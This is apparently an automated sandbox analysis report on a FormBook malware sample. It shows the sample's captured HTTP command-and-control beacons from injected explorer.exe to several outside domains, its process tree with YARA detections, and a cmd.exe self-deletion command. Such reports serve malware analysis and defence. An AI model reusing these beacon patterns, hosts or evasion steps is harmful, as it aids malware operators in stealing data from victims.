2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49764	104.21.86.209	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:15.237628937 CEST	8113	OUT	GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.iwccgroup.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:15.681235075 CEST	8114	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 15:59:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Wed, 17 Mar 2021 11:02:44 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aYGn2VEN7wNFB%2BssKDmUplNRL10Cnzm6Ply0dK5FRfCgz5iFtoVNECzO9P%2FVSq3nQ78mZwjTNHso5RXhTIBLuQydQrnYDJQaxNDkUofb5UxvvUTbjFk9fUuiHEaG3iwZvc0OLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 672de0086c212c2a-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 62 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 74 6f 70 7b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 34 30 25 20 2d 20 31 34 30 70 78 29 7d 2e 62 6f 74 74 6f 6d 7b 68 65 69 67 68 74 3a 31 35 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 36 30 25 20 2d 20 32 31 30 70 78 29 7d 2e 63 65 6e 74 65 72 7b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 7d 2e 63 69 72 63 6c 65 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 32 36 30 70 78 3b 68 65 69 67 68 74 3a 32 36 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 30 63 36 63 63 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 63 6f 6c 6f 72 3a 23 35 30 35 61 36 34 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 5f 74 65 78 74 22 3e 34 30 34 3c Data Ascii: b98<!DOCTYPE html><html><head><meta charset="utf-8"><style>html{height:100%}body{margin:0 auto;min-height:600px;min-width:800px;height:100%}.top{height:100px;height:calc(40% - 140px)}.bottom{height:150px;height:calc(60% - 210px)}.center{height:350px;text-align:center;vertical-align:middle;font-family:Verdana}.circle{margin:auto;width:260px;height:260px;border-radius:50%;background:#c0c6cc}.circle_text{line-height:260px;font-size:100px;color:#ffffff;font-weight:bold}.text{line-height:40px;font-size:26px;color:#505a64}</style></head><body><div class="top"></div><div class="center"><div class="circle"><div class="circle_text">404<
Jul 22, 2021 17:59:15.681271076 CEST	8115	IN	Data Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 22 20 69 64 3d 22 61 22 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 Data Ascii: /div></div><div><p class="text" id="a"></p></div><script>/* Copyright (c) 2021 Synology Inc. All rights reserved. */(function(){var a=new XMLHttpRequest();a.open("get","/missing",true);a.send();a.onreadystatechange=function(){if(a.read
Jul 22, 2021 17:59:15.681294918 CEST	8116	IN	Data Raw: 3a 22 41 20 6b 65 72 65 73 65 74 74 20 6f 6c 64 61 6c 20 6e 65 6d 20 74 61 6c 5c 75 30 30 65 31 6c 68 61 74 5c 75 30 30 66 33 2e 22 2c 22 70 74 2d 42 52 22 3a 22 4e 5c 75 30 30 65 33 6f 20 66 6f 69 20 70 6f 73 73 5c 75 30 30 65 64 76 65 6c 20 65 Data Ascii: :"A keresett oldal nem tal\u00e1lhat\u00f3.","pt-BR":"N\u00e3o foi poss\u00edvel encontrar a p\u00e1gina que voc\u00ea est\u00e1 buscando.","zh-MO":"\u60a8\u6240\u6307\u5b9a\u7684\u9801\u9762\u4e0d\u5b58\u5728\u3002",da:"Den side, du leder eft
Jul 22, 2021 17:59:15.681312084 CEST	8116	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49766	104.21.40.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:26.254539013 CEST	8127	OUT	GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.manageoceanaccount.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:26.328947067 CEST	8128	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 22 Jul 2021 15:59:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://accountsredapple.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JbKm5i2SCek9R7xmGZATyiecYj9toFFTWwAdJ2uHYmgn7v6rtQwrNmxvRFTprayFO0Y34EXqjPlZaUrfmcLd3JX0muKshErPWsD3Kh4oPFrZdRqY%2FKX6KJ1vQWzyUm0zcllUKvO5lYMFHwT%2FKw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 672de04d4ac74db8-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 62 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: b9<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.1</center></body></html>
Jul 22, 2021 17:59:26.328969002 CEST	8128	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49768	162.241.62.54	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:42.309887886 CEST	8140	OUT	GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.jorgeporcayo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:43.077874899 CEST	8141	IN	HTTP/1.1 200 OK Date: Thu, 22 Jul 2021 15:59:42 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Retry-After: 86400 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Accept-Ranges: none Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 6f 76 69 6d 69 65 6e 74 6f 20 70 65 72 73 6f 6e 61 6c 20 79 20 73 6f 63 69 61 6c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt
Jul 22, 2021 17:59:43.077910900 CEST	8143	IN	Data Raw: 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e Data Ascii: p://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.83" type="text/css"><link rel="icon" sizes="128x128" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/i
Jul 22, 2021 17:59:43.077923059 CEST	8143	IN	Data Raw: 3e 0d 0a 0d 0a Data Ascii: >
Jul 22, 2021 17:59:43.079334974 CEST	8143	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49769	172.67.129.33	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:47.938975096 CEST	8144	OUT	GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.builtbydawn.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:48.012661934 CEST	8145	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 22 Jul 2021 15:59:48 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Thu, 22 Jul 2021 16:59:47 GMT Location: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw cf-request-id: 0b708ad90300004a683739f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AQaOuQBfkaMhbLJYTnjyTn%2B9V6LFXVSCCrJZFhJdSk1iIL0Ti%2FSzxRG7q%2BX8h03hw5r6JYtETdd%2FrLCVsXRDyGbFTsxD61nVk%2FFDnj0efn5Y45Zl%2FnKYd4pp7XLxmEr8HXM%2BSmLs"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 672de0d4dc534a68-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49770	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:53.125844002 CEST	8146	OUT	GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.invisiongc.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:53.264167070 CEST	8147	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 22 Jul 2021 15:59:53 GMT Content-Type: text/html Content-Length: 275 ETag: "60ef677e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 85vLO1Rpcy.exe PID: 6800 Parent PID: 5904

General

Start time:	17:57:43
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\85vLO1Rpcy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Imagebase:	0x400000
File size:	177038 bytes
MD5 hash:	91663BEE11EC2466C36FF85805041FFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 85vLO1Rpcy.exe PID: 6872 Parent PID: 6800

General

Start time:	17:57:45
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\85vLO1Rpcy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Imagebase:	0x400000
File size:	177038 bytes
MD5 hash:	91663BEE11EC2466C36FF85805041FFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6872

General

Start time:	17:57:51
Start date:	22/07/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 6116 Parent PID: 3424

General

Start time:	17:58:12
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0x310000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6408 Parent PID: 6116

General

Start time:	17:58:17
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6404 Parent PID: 6408

General

Start time:	17:58:17
Start date:	22/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 85vLO1Rpcy.exe PID: 6800 Parent PID: 5904 85vLO1Rpcy.exeCOMMON

Executed Functions

Function 020706DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 020707B4
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 020707DE
ReadFile.KERNELBASE(00000000,00000000,0207026C,?,00000000), ref: 020707F5
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 02070817
FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,020701AE,7FDFFF66), ref: 0207088A
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02070895
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,020701AE), ref: 020708E0

Memory Dump Source

Source File: 00000001.00000002.662573580.0000000002070000.00000040.00000001.sdmp, Offset: 02070000, based on PE: false

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: 053bd6df27eee7c5241515eab344784051c00a4b8f9a633cd34784aaf4746938
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
